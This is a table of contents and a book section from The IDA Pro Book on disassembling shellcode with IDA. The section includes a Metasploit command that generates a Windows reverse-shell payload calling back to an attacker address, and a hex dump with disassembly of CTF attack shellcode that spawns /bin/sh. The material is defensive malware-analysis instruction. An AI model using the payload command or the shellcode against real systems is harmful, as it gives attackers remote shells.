Table of Contents for
The IDA Pro Book, 2nd Edition

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition The IDA Pro Book, 2nd Edition by Chris Eagle Published by No Starch Press, 2011
  1. Cover
  2. The IDA Pro Book
  3. PRAISE FOR THE FIRST EDITION OF THE IDA PRO BOOK
  4. Acknowledgments
  5. Introduction
  6. I. Introduction to IDA
  7. 1. Introduction to Disassembly
  8. The What of Disassembly
  9. The Why of Disassembly
  10. The How of Disassembly
  11. Summary
  12. 2. Reversing and Disassembly Tools
  13. Summary Tools
  14. Deep Inspection Tools
  15. Summary
  16. 3. IDA Pro Background
  17. Obtaining IDA Pro
  18. IDA Support Resources
  19. Your IDA Installation
  20. Thoughts on IDA’s User Interface
  21. Summary
  22. II. Basic IDA Usage
  23. 4. Getting Started with IDA
  24. IDA Database Files
  25. Introduction to the IDA Desktop
  26. Desktop Behavior During Initial Analysis
  27. IDA Desktop Tips and Tricks
  28. Reporting Bugs
  29. Summary
  30. 5. IDA Data Displays
  31. Secondary IDA Displays
  32. Tertiary IDA Displays
  33. Summary
  34. 6. Disassembly Navigation
  35. Stack Frames
  36. Searching the Database
  37. Summary
  38. 7. Disassembly Manipulation
  39. Commenting in IDA
  40. Basic Code Transformations
  41. Basic Data Transformations
  42. Summary
  43. 8. Datatypes and Data Structures
  44. Creating IDA Structures
  45. Using Structure Templates
  46. Importing New Structures
  47. Using Standard Structures
  48. IDA TIL Files
  49. C++ Reversing Primer
  50. Summary
  51. 9. Cross-References and Graphing
  52. IDA Graphing
  53. Summary
  54. 10. The Many Faces of IDA
  55. Using IDA’s Batch Mode
  56. Summary
  57. III. Advanced IDA Usage
  58. 11. Customizing IDA
  59. Additional IDA Configuration Options
  60. Summary
  61. 12. Library Recognition Using FLIRT Signatures
  62. Applying FLIRT Signatures
  63. Creating FLIRT Signature Files
  64. Summary
  65. 13. Extending IDA’s Knowledge
  66. Augmenting Predefined Comments with loadint
  67. Summary
  68. 14. Patching Binaries and Other IDA Limitations
  69. IDA Output Files and Patch Generation
  70. Summary
  71. IV. Extending IDA’s Capabilities
  72. 15. IDA Scripting
  73. The IDC Language
  74. Associating IDC Scripts with Hotkeys
  75. Useful IDC Functions
  76. IDC Scripting Examples
  77. IDAPython
  78. IDAPython Scripting Examples
  79. Summary
  80. 16. The IDA Software Development Kit
  81. The IDA Application Programming Interface
  82. Summary
  83. 17. The IDA Plug-in Architecture
  84. Building Your Plug-ins
  85. Installing Plug-ins
  86. Configuring Plug-ins
  87. Extending IDC
  88. Plug-in User Interface Options
  89. Scripted Plug-ins
  90. Summary
  91. 18. Binary Files and IDA Loader Modules
  92. Manually Loading a Windows PE File
  93. IDA Loader Modules
  94. Writing an IDA Loader Using the SDK
  95. Alternative Loader Strategies
  96. Writing a Scripted Loader
  97. Summary
  98. 19. IDA Processor Modules
  99. The Python Interpreter
  100. Writing a Processor Module Using the SDK
  101. Building Processor Modules
  102. Customizing Existing Processors
  103. Processor Module Architecture
  104. Scripting a Processor Module
  105. Summary
  106. V. Real-World Applications
  107. 20. Compiler Personalities
  108. RTTI Implementations
  109. Locating main
  110. Debug vs. Release Binaries
  111. Alternative Calling Conventions
  112. Summary
  113. 21. Obfuscated Code Analysis
  114. Anti–Dynamic Analysis Techniques
  115. Static De-obfuscation of Binaries Using IDA
  116. Virtual Machine-Based Obfuscation
  117. Summary
  118. 22. Vulnerability Analysis
  119. After-the-Fact Vulnerability Discovery with IDA
  120. IDA and the Exploit-Development Process
  121. Analyzing Shellcode
  122. Summary
  123. 23. Real-World IDA Plug-ins
  124. IDAPython
  125. collabREate
  126. ida-x86emu
  127. Class Informer
  128. MyNav
  129. IdaPdf
  130. Summary
  131. VI. The IDA Debugger
  132. 24. The IDA Debugger
  133. Basic Debugger Displays
  134. Process Control
  135. Automating Debugger Tasks
  136. Summary
  137. 25. Disassembler/Debugger Integration
  138. IDA Databases and the IDA Debugger
  139. Debugging Obfuscated Code
  140. IdaStealth
  141. Dealing with Exceptions
  142. Summary
  143. 26. Additional Debugger Features
  144. Debugging with Bochs
  145. Appcall
  146. Summary
  147. A. Using IDA Freeware 5.0
  148. Using IDA Freeware
  149. B. IDC/SDK Cross-Reference
  150. Index
  151. About the Author

Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive tool. Before we conclude, it might be nice to offer up at least one use for IDA as a defensive tool. As with any other binary code, there is only one way to determine what shellcode does, and that is to disassemble it. Of course, the first requirement is to get your hands on some shellcode. If you are the curious type and have always wondered how Metasploit payloads work, you might simply use Metasploit to generate a payload in raw form and then disassemble the resulting blob.

The following Metasploit command generates a payload that calls back to port 4444 on the attacker’s computer and grants the attacker a shell on the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R >
w32_reverse_4444

The resulting file contains the requested payload in its raw binary form. The file can be opened in IDA (in binary form since it has no specific format) and a disassembly obtained by converting the displayed bytes into code.

Another place that shellcode can turn up is in network packet captures. Narrowing down exactly which packets contain shellcode can be a challenge, and you are invited to check out any of the vast number of books on network security that will be happy to tell you just how to find all those nasty packets. For now consider the reassembled client stream of an attack observed on the Capture the Flag network at DEFCON 18:

00000000   AD 02 0E 08  01 00 00 00  47 43 4E 93  43 4B 91 90  ........GCN.CK..
00000010   92 47 4E 46  96 46 41 4A  43 4F 99 41  40 49 48 43  .GNF.FAJCO.A@IHC
00000020   4A 4E 4B 43  42 49 93 4B  4A 41 47 46  46 46 43 90  JNKCBI.KJAGFFFC.
00000030   4E 46 97 4A  43 90 42 91  46 90 4E 97  42 48 41 48  NF.JC.B.F.N.BHAH
00000040   97 93 48 97  93 42 40 4B  99 4A 6A 02  58 CD 80 09  ..H..B@K.Jj.X...
00000050   D2 75 06 6A  01 58 50 CD  80 33 C0 B4  10 2B E0 31  .u.j.XP..3...+.1
00000060   D2 52 89 E6  52 52 B2 80  52 B2 04 52  56 52 52 66  .R..RR..R..RVRRf
00000070   FF 46 E8 6A  1D 58 CD 80  81 3E 48 41  43 4B 75 EF  .F.j.X...>HACKu.
00000080   5A 5F 6A 02  59 6A 5A 58  99 51 57 51  CD 80 49 79  Z_j.YjZX.QWQ..Iy
00000090   F4 52 68 2F  2F 73 68 68  2F 62 69 6E  89 E3 50 54  .Rh//shh/bin..PT
000000A0   53 53 B0 3B  CD 80 41 41  49 47 41 93  97 97 4B 48  SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based on other data associated with this particular network connection, the binary data is assumed to be shellcode. Packet-analysis tools such as Wireshark[199] often possess the capability to extract TCP session content directly to a file. In the case of Wireshark, once you find a TCP session of interest, you can use the Follow TCP Stream command and then save the raw stream content to a file. The resulting file can then be loaded into IDA (using IDA’s binary loader) and analyzed further. Often network attack sessions contain a mix of shellcode and application layer content. In order to properly disassemble the shellcode, you must correctly locate the first bytes of the attacker’s payload. The level of difficulty in doing this will vary from one attack to the next and one protocol to the next. In some cases, long NOP slides will be obvious (long sequences of 0x90 for x86 attacks), while in other cases (such as the current example), locating the NOPs, and therefore the shellcode, may be less obvious. The preceding hex dump, for example, actually contains a NOP slide; however, instead of actual x86 NOPs, a randomly generated sequence of 1-byte instructions that have no effect on the shell code to follow is used. Since an infinite number of permutations exist for such a NOP slide, the danger that a network intrusion detection system will recognize and alert on the NOP slide is diminished. Finally, some knowledge of the application that is being attacked may help in distinguishing data elements meant for consumption by the application from shellcode meant to be executed. In this case, with a little effort, IDA disassembles the preceding binary content as shown here:

  seg000:00000000           db 0ADh ; ¡
   seg000:00000001           db    2
   seg000:00000002           db  0Eh
   seg000:00000003           db    8
   seg000:00000004           db    1
   seg000:00000005           db    0
   seg000:00000006           db    0
   seg000:00000007           db    0
   seg000:00000008 ; --------------------------------------------------------------
   seg000:00000008           inc     edi
   seg000:00000009           inc     ebx
   seg000:0000000A           dec     esi
   ...             ; NOP slide and shellcode initialization omitted
   seg000:0000006D           push    edx
   seg000:0000006E           push    edx
   seg000:0000006F
   seg000:0000006F loc_6F:                   ; CODE XREF:  seg000:0000007E↓j
   seg000:0000006F           inc     word ptr [esi-18h]
   seg000:00000073           push    1Dh
   seg000:00000075           pop     eax
  seg000:00000076           int     80h     ; LINUX - sys_pause
   seg000:00000078           cmp     dword ptr [esi], 4B434148h
   seg000:0000007E           jnz     short loc_6F
   seg000:00000080           pop     edx
   seg000:00000081           pop     edi
   seg000:00000082           push    2
   seg000:00000084           pop     ecx
   seg000:00000085
   seg000:00000085 loc_85:                   ; CODE XREF:  seg000:0000008F↓j
   seg000:00000085           push    5Ah ; 'Z'
   seg000:00000087           pop     eax
   seg000:00000088           cdq
   seg000:00000089           push    ecx
   seg000:0000008A           push    edi
   seg000:0000008B           push    ecx
  seg000:0000008C           int     80h     ; LINUX - old_mmap
   seg000:0000008E           dec     ecx
   seg000:0000008F           jns     short loc_85
   seg000:00000091           push    edx
   seg000:00000092           push    'hs//'
   seg000:00000097           push    'nib/'
   ...             ; continues to invoke execve to spawn the shell

One point worth noting is that the first 8 bytes of the stream are actually protocol data, not shellcode, and thus we have chosen not to disassemble them. Also, IDA seems to have misidentified the system calls that are being made at and . We have omitted the fact that this exploit was targeting a FreeBSD application, which would be helpful in decoding the system call numbers being used in the payload. Because IDA is only capable of annotating Linux system call numbers, we are left to do a little research to learn that FreeBSD system call 29 (1dh) is actually recvfrom (rather than pause) and system call 90 (5Ah) is actually the dup2 function (rather than old_mmap).

Because it lacks any header information useful to IDA, shellcode will generally require extra attention in order to be properly disassembled. In addition, shellcode encoders are frequently employed as a means of evading intrusion detection systems. Such encoders have an effect very much like the effect that obfuscation tools have on standard binaries, further complicating the shellcode-disassembly process.